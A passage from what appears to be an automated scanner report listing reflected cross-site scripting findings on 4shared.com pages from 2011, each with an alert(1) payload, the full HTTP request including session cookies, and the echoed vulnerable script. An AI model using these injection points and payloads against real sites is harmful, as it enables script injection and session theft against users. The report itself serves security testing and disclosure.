var url="/abuse.jsp?aLink=http://www.4shared.com/js903c6"-alert(1)-"7ad83cf2909/homeScript.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
...[SNIP]...

2.80. http://www.4shared.com/js/homeScript.jsp [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/homeScript.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bef0b"-alert(1)-"0416efb1ed1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /js/homeScript.jspbef0b"-alert(1)-"0416efb1ed1?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js/homeScript.jspbef0b"-alert(1)-"0416efb1ed1
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:11:10 GMT
Content-Length: 38618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/js/homeScript.jspbef0b"-alert(1)-"0416efb1ed1";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.81. http://www.4shared.com/js/homeScript.jsp [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/homeScript.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79b74'-alert(1)-'d49b274a034 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /js/homeScript.jsp79b74'-alert(1)-'d49b274a034?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js/homeScript.jsp79b74'-alert(1)-'d49b274a034
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:11:12 GMT
Content-Length: 38620

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
ginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/js/homeScript.jsp79b74'-alert(1)-'d49b274a034',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ensu
...[SNIP]...

2.82. http://www.4shared.com/js/index.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/index.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe8c3"-alert(1)-"07080f1b397 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /jsfe8c3"-alert(1)-"07080f1b397/index.js?ver=5756 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/desktop/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329

Response

HTTP/1.1 404 /jsfe8c3"-alert(1)-"07080f1b397/index.js
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:01:37 GMT
Content-Length: 38803

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/jsfe8c3"-alert(1)-"07080f1b397/index.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

2.83. http://www.4shared.com/js/index.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/index.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bcd10'-alert(1)-'7b2303e759b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /jsbcd10'-alert(1)-'7b2303e759b/index.js?ver=5756 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/desktop/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329

Response

HTTP/1.1 404 /jsbcd10'-alert(1)-'7b2303e759b/index.js
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:01:42 GMT
Content-Length: 38625

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/jsbcd10'-alert(1)-'7b2303e759b/index.js',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

func
...[SNIP]...

2.84. http://www.4shared.com/js/index.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/index.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3471e'-alert(1)-'697b2b3fba0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /js/index.js3471e'-alert(1)-'697b2b3fba0?ver=5756 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/desktop/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329

Response

HTTP/1.1 404 /js/index.js3471e'-alert(1)-'697b2b3fba0
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:02:12 GMT
Content-Length: 38621

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
eof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/js/index.js3471e'-alert(1)-'697b2b3fba0',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ensu
...[SNIP]...

2.85. http://www.4shared.com/js/index.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/index.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8376c"-alert(1)-"23cab5e01c8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /js/index.js8376c"-alert(1)-"23cab5e01c8?ver=5756 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/desktop/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329

Response

HTTP/1.1 404 /js/index.js8376c"-alert(1)-"23cab5e01c8
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:02:10 GMT
Content-Length: 38799

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/js/index.js8376c"-alert(1)-"23cab5e01c8";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.86. http://www.4shared.com/js/loginScript.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/loginScript.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29552"-alert(1)-"d9019f8d1ea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /js29552"-alert(1)-"d9019f8d1ea/loginScript.jsp?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js29552"-alert(1)-"d9019f8d1ea/loginScript.jsp
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:09:19 GMT
Content-Length: 38803

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/js29552"-alert(1)-"d9019f8d1ea/loginScript.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback()
...[SNIP]...

2.87. http://www.4shared.com/js/loginScript.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/loginScript.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb2cb'-alert(1)-'44a11509354 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /jseb2cb'-alert(1)-'44a11509354/loginScript.jsp?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /jseb2cb'-alert(1)-'44a11509354/loginScript.jsp
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:09:22 GMT
Content-Length: 38626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/jseb2cb'-alert(1)-'44a11509354/loginScript.jsp',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

...[SNIP]...

2.88. http://www.4shared.com/js/loginScript.jsp [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/loginScript.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 968ec"-alert(1)-"27a6483c905 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /js/loginScript.jsp968ec"-alert(1)-"27a6483c905?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js/loginScript.jsp968ec"-alert(1)-"27a6483c905
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:09:33 GMT
Content-Length: 38806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/js/loginScript.jsp968ec"-alert(1)-"27a6483c905";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.89. http://www.4shared.com/js/loginScript.jsp [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/loginScript.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f5cc'-alert(1)-'0dbfda8d792 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /js/loginScript.jsp1f5cc'-alert(1)-'0dbfda8d792?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js/loginScript.jsp1f5cc'-alert(1)-'0dbfda8d792
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:09:35 GMT
Content-Length: 38628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
inBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/js/loginScript.jsp1f5cc'-alert(1)-'0dbfda8d792',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ensu
...[SNIP]...

2.90. http://www.4shared.com/js/signup-script.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/signup-script.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93807"-alert(1)-"25dbcc111af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /js93807"-alert(1)-"25dbcc111af/signup-script.jsp?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js93807"-alert(1)-"25dbcc111af/signup-script.jsp
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:09:10 GMT
Content-Length: 38638

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/js93807"-alert(1)-"25dbcc111af/signup-script.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback(
...[SNIP]...

2.91. http://www.4shared.com/js/signup-script.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/signup-script.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload faa74'-alert(1)-'af3f7427ec1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /jsfaa74'-alert(1)-'af3f7427ec1/signup-script.jsp?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /jsfaa74'-alert(1)-'af3f7427ec1/signup-script.jsp
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:09:13 GMT
Content-Length: 38636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/jsfaa74'-alert(1)-'af3f7427ec1/signup-script.jsp',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}

...[SNIP]...

2.92. http://www.4shared.com/js/signup-script.jsp [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/signup-script.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b4b9'-alert(1)-'e0376698f8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /js/signup-script.jsp2b4b9'-alert(1)-'e0376698f8?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js/signup-script.jsp2b4b9'-alert(1)-'e0376698f8
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:09:26 GMT
Content-Length: 38813

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
Box == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/js/signup-script.jsp2b4b9'-alert(1)-'e0376698f8',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ensu
...[SNIP]...

2.93. http://www.4shared.com/js/signup-script.jsp [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/signup-script.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b523a"-alert(1)-"9bac3986693 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /js/signup-script.jspb523a"-alert(1)-"9bac3986693?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js/signup-script.jspb523a"-alert(1)-"9bac3986693
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:09:24 GMT
Content-Length: 38633

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/js/signup-script.jspb523a"-alert(1)-"9bac3986693";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.94. http://www.4shared.com/login.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/login.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c153c"-alert(1)-"950b51e8972 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /login.jspc153c"-alert(1)-"950b51e8972 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; ppVisited=%2Fsignup.jsp; ppVisitDate=1311947871563

Response

HTTP/1.1 404 /login.jspc153c"-alert(1)-"950b51e8972
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:01:37 GMT
Content-Length: 38584

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/login.jspc153c"-alert(1)-"950b51e8972";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.95. http://www.4shared.com/login.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/login.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7c0c7'-alert(1)-'2190480f510 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /login.jsp7c0c7'-alert(1)-'2190480f510 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
